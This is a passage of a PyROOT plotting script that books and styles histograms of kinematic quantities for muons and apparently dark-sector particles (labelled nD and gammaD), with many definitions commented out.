#h_n1_2_pT_dummy = ROOT.TH1F("h_n1_2_pT_dummy", "h_n1_2_pT_dummy", 700, 0, 70) #this is the peak at ~10GeV
#h_n1_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_pT_dummy.SetXTitle("p_{T n_{1}} [GeV]")
#h_n1_2_pT_dummy.SetMaximum( yMax )
#
#h_n1_2_p_dummy = ROOT.TH1F("h_n1_2_p_dummy", "h_n1_2_p_dummy", 20, 50, 70)
#h_n1_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_p_dummy.SetXTitle("p_{n_{1}} [GeV]")
#h_n1_2_p_dummy.SetMaximum( 0.05 )
#
#h_n1_2_M_dummy = ROOT.TH1F("h_n1_2_M_dummy", "h_n1_2_M_dummy", 200, 0, 20)
#h_n1_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_M_dummy.SetXTitle("m_{n_{1}} [GeV]")
#h_n1_2_M_dummy.SetMaximum( 1.2 )
h_n1_2_p = ROOT.TH1F("h_n1_2_p", "h_n1_2_p", 300, 0, 300)
h_n1_2_p.SetLineColor(ROOT.kRed)
h_n1_2_p.SetLineWidth(2)
h_n1_2_p.SetLineStyle(1)
#h_n1_2_M = ROOT.TH1F("h_n1_2_M", "h_n1_2_M", 200, 0.05, 20.05)
#h_n1_2_M.SetLineColor(ROOT.kRed)
#h_n1_2_M.SetLineWidth(2)
#h_n1_2_M.SetLineStyle(1)
h_n1_2_pT = ROOT.TH1F("h_n1_2_pT", "h_n1_2_pT", 70, 0, 70)
h_n1_2_pT.SetLineColor(ROOT.kRed)
h_n1_2_pT.SetLineWidth(2)
h_n1_2_pT.SetLineStyle(1)
h_nD_1_pT_dummy = ROOT.TH1F("h_nD_1_pT_dummy", "h_nD_1_pT_dummy", 130, 0, 130)
h_nD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pT_dummy.SetXTitle("p_{T} of n_{D} [GeV]")
h_nD_1_pT_dummy.SetMaximum( 0.1 )
h_n1_2_pZ = ROOT.TH1F("h_n1_2_pZ", "h_n1_2_pZ", 300, 0, 300)
h_n1_2_pZ.SetLineColor(ROOT.kRed)
h_n1_2_pZ.SetLineWidth(2)
h_n1_2_pZ.SetLineStyle(1)
h_nD_1_pZ_dummy = ROOT.TH1F("h_nD_1_pZ_dummy", "h_nD_1_pZ_dummy", 130, 0, 130)
h_nD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{D} [GeV]")
h_nD_1_pZ_dummy.SetMaximum( 0.1 )
h_n1_2_Eta = ROOT.TH1F("h_n1_2_Eta", "h_n1_2_Eta", 100,-5,5)
h_n1_2_Eta.SetLineColor(ROOT.kRed)
h_n1_2_Eta.SetLineWidth(2)
h_n1_2_Eta.SetLineStyle(1)
h_nD_1_Eta_dummy = ROOT.TH1F("h_nD_1_Eta_dummy", "h_nD_1_Eta_dummy", 100,-5,5)
h_nD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_nD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Eta_dummy.SetXTitle("#eta of n_{D}")
h_nD_1_Eta_dummy.SetMaximum( 0.1 )
h_n1_2_Phi = ROOT.TH1F("h_n1_2_Phi", "h_n1_2_Phi", 80,-4,4)
h_n1_2_Phi.SetLineColor(ROOT.kRed)
h_n1_2_Phi.SetLineWidth(2)
h_n1_2_Phi.SetLineStyle(1)
h_nD_1_Phi_dummy = ROOT.TH1F("h_nD_1_Phi_dummy", "h_nD_1_Phi_dummy", 80,-4,4)
h_nD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_nD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Phi_dummy.SetXTitle("#phi of n_{D} [rad]")
h_nD_1_Phi_dummy.SetMaximum( 0.05 )
h_nD_1_p_dummy = ROOT.TH1F("h_nD_1_p_dummy", "h_nD_1_p_dummy", 130, 0, 130)
h_nD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_p_dummy.SetXTitle("p of n_{D} [GeV]")
h_nD_1_p_dummy.SetMaximum( 0.1 )
h_nD_1_M_dummy = ROOT.TH1F("h_nD_1_M_dummy", "h_nD_1_M_dummy", 20, 0.05, 2.05)
h_nD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_nD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_M_dummy.SetXTitle("Mass of n_{D} [GeV]")
h_nD_1_M_dummy.SetMaximum( 1.6 )
h_nD_1_p = ROOT.TH1F("h_nD_1_p", "h_nD_1_p", 130, 0, 130)
h_nD_1_p.SetLineColor(ROOT.kBlue)
h_nD_1_p.SetLineWidth(2)
h_nD_1_p.SetLineStyle(1)
h_nD_1_M = ROOT.TH1F("h_nD_1_M", "h_nD_1_M", 20, 0.05, 2.05)
h_nD_1_M.SetLineColor(ROOT.kBlue)
h_nD_1_M.SetLineWidth(2)
h_nD_1_M.SetLineStyle(1)
h_nD_1_pT = ROOT.TH1F("h_nD_1_pT", "h_nD_1_pT", 130, 0, 130)
h_nD_1_pT.SetLineColor(ROOT.kBlue)
h_nD_1_pT.SetLineWidth(2)
h_nD_1_pT.SetLineStyle(1)
h_nD_1_pZ = ROOT.TH1F("h_nD_1_pZ", "h_nD_1_pZ", 130, 0, 130)
h_nD_1_pZ.SetLineColor(ROOT.kBlue)
h_nD_1_pZ.SetLineWidth(2)
h_nD_1_pZ.SetLineStyle(1)
h_nD_1_Eta = ROOT.TH1F("h_nD_1_Eta", "h_nD_1_Eta", 100,-5,5)
h_nD_1_Eta.SetLineColor(ROOT.kBlue)
h_nD_1_Eta.SetLineWidth(2)
h_nD_1_Eta.SetLineStyle(1)
h_nD_1_Phi = ROOT.TH1F("h_nD_1_Phi", "h_nD_1_Phi", 80,-4,4)
h_nD_1_Phi.SetLineColor(ROOT.kBlue)
h_nD_1_Phi.SetLineWidth(2)
h_nD_1_Phi.SetLineStyle(1)
#h_nD_2_pT_dummy = ROOT.TH1F("h_nD_2_pT_dummy", "h_nD_2_pT_dummy", 100, 0, 100)
#h_nD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_pT_dummy.SetXTitle("p_{T nD_2} [GeV]")
#h_nD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_nD_2_p_dummy = ROOT.TH1F("h_nD_2_p_dummy", "h_nD_2_p_dummy", 100, 0, 100)
#h_nD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_p_dummy.SetXTitle("p_{nD_2} [GeV]")
#h_nD_2_p_dummy.SetMaximum( 0.01 )
#
#h_nD_2_M_dummy = ROOT.TH1F("h_nD_2_M_dummy", "h_nD_2_M_dummy", 20, 0, 2)
#h_nD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_M_dummy.SetXTitle("m_{nD_2} [GeV]")
#h_nD_2_M_dummy.SetMaximum( 1.2 )
h_nD_2_p = ROOT.TH1F("h_nD_2_p", "h_nD_2_p", 130, 0, 130)
h_nD_2_p.SetLineColor(ROOT.kRed)
h_nD_2_p.SetLineWidth(2)
h_nD_2_p.SetLineStyle(1)
#h_nD_2_M = ROOT.TH1F("h_nD_2_M", "h_nD_2_M", 20, 0.05, 2.05)
#h_nD_2_M.SetLineColor(ROOT.kRed)
#h_nD_2_M.SetLineWidth(2)
#h_nD_2_M.SetLineStyle(1)
h_nD_2_pT = ROOT.TH1F("h_nD_2_pT", "h_nD_2_pT", 130, 0, 130)
h_nD_2_pT.SetLineColor(ROOT.kRed)
h_nD_2_pT.SetLineWidth(2)
h_nD_2_pT.SetLineStyle(1)
h_gammaD_1_pT_dummy = ROOT.TH1F("h_gammaD_1_pT_dummy", "h_gammaD_1_pT_dummy", 100, 0, 100)
h_gammaD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pT_dummy.SetXTitle("p_{T} of #gamma_{D} [GeV]")
h_gammaD_1_pT_dummy.SetMaximum( 0.1 )
h_nD_2_pZ = ROOT.TH1F("h_nD_2_pZ", "h_nD_2_pZ", 130, 0, 130)
h_nD_2_pZ.SetLineColor(ROOT.kRed)
h_nD_2_pZ.SetLineWidth(2)
h_nD_2_pZ.SetLineStyle(1)
h_gammaD_1_pZ_dummy = ROOT.TH1F("h_gammaD_1_pZ_dummy", "h_gammaD_1_pZ_dummy", 100, 0, 100)
h_gammaD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pZ_dummy.SetXTitle("|p_{Z}| of #gamma_{D} [GeV]")
h_gammaD_1_pZ_dummy.SetMaximum( 0.1 )
h_nD_2_Eta = ROOT.TH1F("h_nD_2_Eta", "h_nD_2_Eta", 100,-5,5)
h_nD_2_Eta.SetLineColor(ROOT.kRed)
h_nD_2_Eta.SetLineWidth(2)
h_nD_2_Eta.SetLineStyle(1)
h_gammaD_1_Eta_dummy = ROOT.TH1F("h_gammaD_1_Eta_dummy", "h_gammaD_1_Eta_dummy",100,-5,5)
h_gammaD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_gammaD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Eta_dummy.SetXTitle("#eta of #gamma_{D}")
h_gammaD_1_Eta_dummy.SetMaximum( 0.1 )
h_nD_2_Phi = ROOT.TH1F("h_nD_2_Phi", "h_nD_2_Phi", 80,-4,4)
h_nD_2_Phi.SetLineColor(ROOT.kRed)
h_nD_2_Phi.SetLineWidth(2)
h_nD_2_Phi.SetLineStyle(1)
h_gammaD_1_Phi_dummy = ROOT.TH1F("h_gammaD_1_Phi_dummy", "h_gammaD_1_Phi_dummy",80,-4,4 )
h_gammaD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_gammaD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Phi_dummy.SetXTitle("#phi of #gamma_{D} [rad]")
h_gammaD_1_Phi_dummy.SetMaximum( 0.05 )
h_gammaD_1_p_dummy = ROOT.TH1F("h_gammaD_1_p_dummy", "h_gammaD_1_p_dummy", 100, 0, 100)
h_gammaD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_p_dummy.SetXTitle("p of #gamma_{D} [GeV]")
h_gammaD_1_p_dummy.SetMaximum( 0.1 )
h_gammaD_1_M_dummy = ROOT.TH1F("h_gammaD_1_M_dummy", "h_gammaD_1_M_dummy", 101, 0.1, 10.1)
h_gammaD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_gammaD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_M_dummy.SetXTitle("Mass of #gamma_{D} [GeV]")
h_gammaD_1_M_dummy.SetMaximum( 1.4 )
h_gammaD_1_p = ROOT.TH1F("h_gammaD_1_p", "h_gammaD_1_p", 100, 0, 100)
h_gammaD_1_p.SetLineColor(ROOT.kBlue)
h_gammaD_1_p.SetLineWidth(2)
h_gammaD_1_p.SetLineStyle(1)
h_gammaD_1_M = ROOT.TH1F("h_gammaD_1_M", "h_gammaD_1_M", 101, 0.1, 10.1)
h_gammaD_1_M.SetLineColor(ROOT.kBlue)
h_gammaD_1_M.SetLineWidth(2)
h_gammaD_1_M.SetLineStyle(1)
h_gammaD_1_pT = ROOT.TH1F("h_gammaD_1_pT", "h_gammaD_1_pT", 100, 0, 100)
h_gammaD_1_pT.SetLineColor(ROOT.kBlue)
h_gammaD_1_pT.SetLineWidth(2)
h_gammaD_1_pT.SetLineStyle(1)
h_gammaD_1_pZ = ROOT.TH1F("h_gammaD_1_pZ", "h_gammaD_1_pZ", 100, 0, 100)
h_gammaD_1_pZ.SetLineColor(ROOT.kBlue)
h_gammaD_1_pZ.SetLineWidth(2)
h_gammaD_1_pZ.SetLineStyle(1)
h_gammaD_1_Eta = ROOT.TH1F("h_gammaD_1_Eta", "h_gammaD_1_Eta",100,-5,5)
h_gammaD_1_Eta.SetLineColor(ROOT.kBlue)
h_gammaD_1_Eta.SetLineWidth(2)
h_gammaD_1_Eta.SetLineStyle(1)
h_gammaD_1_Phi = ROOT.TH1F("h_gammaD_1_Phi", "h_gammaD_1_Phi", 80,-4,4)
h_gammaD_1_Phi.SetLineColor(ROOT.kBlue)
h_gammaD_1_Phi.SetLineWidth(2)
h_gammaD_1_Phi.SetLineStyle(1)
#h_gammaD_2_pT_dummy = ROOT.TH1F("h_gammaD_2_pT_dummy", "h_gammaD_2_pT_dummy", 100, 0, 100)
#h_gammaD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_pT_dummy.SetXTitle("p_{T gammaD_2} [GeV]")
#h_gammaD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_p_dummy = ROOT.TH1F("h_gammaD_2_p_dummy", "h_gammaD_2_p_dummy", 100, 0, 100)
#h_gammaD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_p_dummy.SetXTitle("p_{gammaD_2} [GeV]")
#h_gammaD_2_p_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_M_dummy = ROOT.TH1F("h_gammaD_2_M_dummy", "h_gammaD_2_M_dummy", 300, 0, 3)
#h_gammaD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_M_dummy.SetXTitle("m_{gammaD_2} [GeV]")
#h_gammaD_2_M_dummy.SetMaximum( 1.2 )
h_gammaD_2_p = ROOT.TH1F("h_gammaD_2_p", "h_gammaD_2_p", 100, 0, 100)
h_gammaD_2_p.SetLineColor(ROOT.kRed)
h_gammaD_2_p.SetLineWidth(2)
h_gammaD_2_p.SetLineStyle(1)
#h_gammaD_2_M = ROOT.TH1F("h_gammaD_2_M", "h_gammaD_2_M", 500, 0.005, 10.005)
#h_gammaD_2_M.SetLineColor(ROOT.kRed)
#h_gammaD_2_M.SetLineWidth(2)
#h_gammaD_2_M.SetLineStyle(1)
h_gammaD_2_pT = ROOT.TH1F("h_gammaD_2_pT", "h_gammaD_2_pT", 100, 0, 100)
h_gammaD_2_pT.SetLineColor(ROOT.kRed)
h_gammaD_2_pT.SetLineWidth(2)
h_gammaD_2_pT.SetLineStyle(1)
h_gammaD_2_pZ = ROOT.TH1F("h_gammaD_2_pZ", "h_gammaD_2_pZ", 100, 0, 100)
h_gammaD_2_pZ.SetLineColor(ROOT.kRed)
h_gammaD_2_pZ.SetLineWidth(2)
h_gammaD_2_pZ.SetLineStyle(1)
h_gammaD_2_Eta = ROOT.TH1F("h_gammaD_2_Eta", "h_gammaD_2_Eta", 100,-5,5)
h_gammaD_2_Eta.SetLineColor(ROOT.kRed)
h_gammaD_2_Eta.SetLineWidth(2)
h_gammaD_2_Eta.SetLineStyle(1)
h_gammaD_2_Phi = ROOT.TH1F("h_gammaD_2_Phi", "h_gammaD_2_Phi", 80,-4,4)
h_gammaD_2_Phi.SetLineColor(ROOT.kRed)
h_gammaD_2_Phi.SetLineWidth(2)
h_gammaD_2_Phi.SetLineStyle(1)
h_muon_pT_0 = ROOT.TH1F("h_muon_pT_0", "h_muon_pT_0", nBins, binMin, binMax)
h_muon_pT_0.SetLineColor(ROOT.kBlue)
h_muon_pT_0.SetLineWidth(2)
h_muon_pT_0.SetLineStyle(1)
h_muon_pT_1 = ROOT.TH1F("h_muon_pT_1", "h_muon_pT_1", nBins, binMin, binMax)
h_muon_pT_1.SetLineColor(ROOT.kGreen)
h_muon_pT_1.SetLineWidth(2)
h_muon_pT_1.SetLineStyle(2)
h_muon_pT_2 = ROOT.TH1F("h_muon_pT_2", "h_muon_pT_2", nBins, binMin, binMax)
h_muon_pT_2.SetLineColor(ROOT.kRed)
h_muon_pT_2.SetLineWidth(2)
h_muon_pT_2.SetLineStyle(3)
h_muon_pT_3 = ROOT.TH1F("h_muon_pT_3", "h_muon_pT_3", nBins, binMin, binMax)
h_muon_pT_3.SetLineColor(ROOT.kBlack)
h_muon_pT_3.SetLineWidth(2)
h_muon_pT_3.SetLineStyle(4)
h_muon_phi_dummy = ROOT.TH1F("h_muon_phi_dummy", "h_muon_phi_dummy", 80, -4, 4)
h_muon_phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_phi_dummy.SetMaximum( 0.1 )
h_muon_phi_0 = ROOT.TH1F("h_muon_phi_0", "h_muon_phi_0", 80, -4, 4)
h_muon_phi_0.SetLineColor(ROOT.kBlue)
h_muon_phi_0.SetLineWidth(2)
h_muon_phi_0.SetLineStyle(1)
h_muon_phi_1 = ROOT.TH1F("h_muon_phi_1", "h_muon_phi_1", 80, -4, 4)
h_muon_phi_1.SetLineColor(ROOT.kGreen)
h_muon_phi_1.SetLineWidth(2)
h_muon_phi_1.SetLineStyle(2)
h_muon_phi_2 = ROOT.TH1F("h_muon_phi_2", "h_muon_phi_2", 80, -4, 4)
h_muon_phi_2.SetLineColor(ROOT.kRed)
h_muon_phi_2.SetLineWidth(2)
h_muon_phi_2.SetLineStyle(3)
h_muon_phi_3 = ROOT.TH1F("h_muon_phi_3", "h_muon_phi_3", 80, -4, 4)
h_muon_phi_3.SetLineColor(ROOT.kBlack)
h_muon_phi_3.SetLineWidth(2)
h_muon_phi_3.SetLineStyle(4)
h_muon_p_dummy = ROOT.TH1F("h_muon_p_dummy", "h_muon_p_dummy", 125, 0, 125)
h_muon_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_p_dummy.SetTitleOffset(1.35, "Y")
h_muon_p_dummy.SetXTitle("p of #mu [GeV]")
h_muon_p_dummy.SetMaximum( 0.2 )
h_muon_p_0 = ROOT.TH1F("h_muon_p_0", "h_muon_p_0", 125, 0, 125)
h_muon_p_0.SetLineColor(ROOT.kBlue)
h_muon_p_0.SetLineWidth(2)
h_muon_p_0.SetLineStyle(1)
h_muon_p_1 = ROOT.TH1F("h_muon_p_1", "h_muon_p_1", 125, 0, 125)
h_muon_p_1.SetLineColor(ROOT.kGreen)
h_muon_p_1.SetLineWidth(2)
h_muon_p_1.SetLineStyle(2)
h_muon_p_2 = ROOT.TH1F("h_muon_p_2", "h_muon_p_2", 125, 0, 125)
h_muon_p_2.SetLineColor(ROOT.kRed)
h_muon_p_2.SetLineWidth(2)
h_muon_p_2.SetLineStyle(3)
h_muon_p_3 = ROOT.TH1F("h_muon_p_3", "h_muon_p_3", 125, 0, 125)
h_muon_p_3.SetLineColor(ROOT.kBlack)
h_muon_p_3.SetLineWidth(2)
h_muon_p_3.SetLineStyle(125)
h_muon_pZ_0 = ROOT.TH1F("h_muon_pZ_0", "h_muon_pZ_0", 125, 0, 125)
h_muon_pZ_0.SetLineColor(ROOT.kBlue)
h_muon_pZ_0.SetLineWidth(2)
h_muon_pZ_0.SetLineStyle(1)
h_muon_pZ_1 = ROOT.TH1F("h_muon_pZ_1", "h_muon_pZ_1", 125, 0, 125)
h_muon_pZ_1.SetLineColor(ROOT.kGreen)
h_muon_pZ_1.SetLineWidth(2)
h_muon_pZ_1.SetLineStyle(2)
h_muon_pZ_2 = ROOT.TH1F("h_muon_pZ_2", "h_muon_pZ_2", 125, 0, 125)
h_muon_pZ_2.SetLineColor(ROOT.kRed)
h_muon_pZ_2.SetLineWidth(2)
h_muon_pZ_2.SetLineStyle(3)
h_muon_pZ_3 = ROOT.TH1F("h_muon_pZ_3", "h_muon_pZ_3", 125, 0, 125)
h_muon_pZ_3.SetLineColor(ROOT.kBlack)
h_muon_pZ_3.SetLineWidth(2)
h_muon_pZ_3.SetLineStyle(125)
################################################################################
# eta of muons
################################################################################
nBins = 60
binMin = -3.0
binMax = 3.0
yMax = 0.045
h_muon_eta_dummy = ROOT.TH1F("h_muon_eta_dummy", "h_muon_eta_dummy", 100, -5, 5)
h_muon_eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_eta_dummy.GetYaxis().SetNdivisions(508);
h_muon_eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_eta_dummy.SetXTitle("#eta of #mu")
h_muon_eta_dummy.SetMaximum( yMax )
h_muon_eta_0 = ROOT.TH1F("h_muon_eta_0", "h_muon_eta_0", 100,-5,5)
h_muon_eta_0.SetLineColor(ROOT.kBlue)
h_muon_eta_0.SetLineWidth(2)
h_muon_eta_0.SetLineStyle(1)
h_muon_eta_1 = ROOT.TH1F("h_muon_eta_1", "h_muon_eta_1", 100,-5,5)
h_muon_eta_1.SetLineColor(ROOT.kGreen)
h_muon_eta_1.SetLineWidth(2)
h_muon_eta_1.SetLineStyle(2)
h_muon_eta_2 = ROOT.TH1F("h_muon_eta_2", "h_muon_eta_2", 100,-5,5)
h_muon_eta_2.SetLineColor(ROOT.kRed)
h_muon_eta_2.SetLineWidth(2)
h_muon_eta_2.SetLineStyle(3)
h_muon_eta_3 = ROOT.TH1F("h_muon_eta_3", "h_muon_eta_3", 100,-5,5)
h_muon_eta_3.SetLineColor(ROOT.kBlack)
h_muon_eta_3.SetLineWidth(2)
h_muon_eta_3.SetLineStyle(4)
################################################################################
# mass of dimuons
################################################################################
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.4
#h_dimuon_m_dummy = ROOT.TH1F("h_dimuon_m_dummy", "h_dimuon_m_dummy", nBins, binMin, binMax)
#h_dimuon_m_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_0 = ROOT.TH1F("h_dimuon_m_0", "h_dimuon_m_0", nBins, binMin, binMax)
#h_dimuon_m_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_0.SetLineWidth(2)
#h_dimuon_m_0.SetLineStyle(1)
#
#h_dimuon_m_1 = ROOT.TH1F("h_dimuon_m_1", "h_dimuon_m_1", nBins, binMin, binMax)
#h_dimuon_m_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_1.SetLineWidth(2)
#h_dimuon_m_1.SetLineStyle(2)
#
#h_dimuon_m_2 = ROOT.TH1F("h_dimuon_m_2", "h_dimuon_m_2", nBins, binMin, binMax)
#h_dimuon_m_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_2.SetLineWidth(2)
#h_dimuon_m_2.SetLineStyle(3)
#
#h_dimuon_m_3 = ROOT.TH1F("h_dimuon_m_3", "h_dimuon_m_3", nBins, binMin, binMax)
#h_dimuon_m_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_3.SetLineWidth(2)
#h_dimuon_m_3.SetLineStyle(4)
#
#h_dimuon_m_log_dummy = ROOT.TH1F("h_dimuon_m_log_dummy", "h_dimuon_m_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_log_0 = ROOT.TH1F("h_dimuon_m_log_0", "h_dimuon_m_log_0", nBins, binMin, binMax)
#h_dimuon_m_log_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_log_0.SetLineWidth(2)
#h_dimuon_m_log_0.SetLineStyle(1)
#
#h_dimuon_m_log_1 = ROOT.TH1F("h_dimuon_m_log_1", "h_dimuon_m_log_1", nBins, binMin, binMax)
#h_dimuon_m_log_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_log_1.SetLineWidth(2)
#h_dimuon_m_log_1.SetLineStyle(2)
#
#h_dimuon_m_log_2 = ROOT.TH1F("h_dimuon_m_log_2", "h_dimuon_m_log_2", nBins, binMin, binMax)
#h_dimuon_m_log_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_log_2.SetLineWidth(2)
#h_dimuon_m_log_2.SetLineStyle(3)
#
#h_dimuon_m_log_3 = ROOT.TH1F("h_dimuon_m_log_3", "h_dimuon_m_log_3", nBins, binMin, binMax)
#h_dimuon_m_log_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_log_3.SetLineWidth(2)
#h_dimuon_m_log_3.SetLineStyle(4)
#
#h_dimuon_m_real_fake_dummy = ROOT.TH1F("h_dimuon_m_real_fake_dummy", "h_dimuon_m_real_fake_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_0 = ROOT.TH1F("h_dimuon_m_real_fake_0", "h_dimuon_m_real_fake_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_0.SetLineWidth(2)
#h_dimuon_m_real_fake_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_1 = ROOT.TH1F("h_dimuon_m_real_fake_1", "h_dimuon_m_real_fake_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_1.SetLineWidth(2)
#h_dimuon_m_real_fake_1.SetLineStyle(2)
#
#h_dimuon_m_real_fake_log_dummy = ROOT.TH1F("h_dimuon_m_real_fake_log_dummy", "h_dimuon_m_real_fake_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_log_0 = ROOT.TH1F("h_dimuon_m_real_fake_log_0", "h_dimuon_m_real_fake_log_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_log_0.SetLineWidth(2)
#h_dimuon_m_real_fake_log_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_log_1 = ROOT.TH1F("h_dimuon_m_real_fake_log_1", "h_dimuon_m_real_fake_log_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_log_1.SetLineWidth(2)
#h_dimuon_m_real_fake_log_1.SetLineStyle(2)
#########################
h_dimuon_m_fake_log_dummy = ROOT.TH1F("h_dimuon_m_fake_log_dummy", "h_dimuon_m_fake_log_dummy", 1250, 0, 125)
h_dimuon_m_fake_log_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_dimuon_m_fake_log_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_log_dummy.SetTitleOffset(1.4, "Y")
h_dimuon_m_fake_log_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_log_dummy.SetMaximum( 1 )
h_dimuon_m_fake_log_0 = ROOT.TH1F("h_dimuon_m_fake_log_0", "h_dimuon_m_fake_log_0", 1250, 0, 125)
h_dimuon_m_fake_log_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_log_0.SetLineWidth(2)
h_dimuon_m_fake_log_0.SetLineStyle(1)
h_dimuon_m_fake_dummy = ROOT.TH1F("h_dimuon_m_fake_dummy", "h_dimuon_m_fake_dummy", nBins, binMin, binMax)
h_dimuon_m_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
h_dimuon_m_fake_dummy.GetYaxis().SetNdivisions(508);
h_dimuon_m_fake_dummy.SetTitleOffset(1.35, "Y")
h_dimuon_m_fake_dummy.SetXTitle("Mass of Fake #mu#mu [GeV]")
h_dimuon_m_fake_dummy.SetMaximum( 1.2 )
h_dimuon_m_fake_0 = ROOT.TH1F("h_dimuon_m_fake_0", "h_dimuon_m_fake_0", nBins, binMin, binMax)
h_dimuon_m_fake_0.SetLineColor(ROOT.kRed)
h_dimuon_m_fake_0.SetLineWidth(2)
h_dimuon_m_fake_0.SetLineStyle(1)
################################################################################
# mass of 2 selected dimuons
################################################################################
m_min = 0.2113
m_max = 3.5536
m_bins = 66
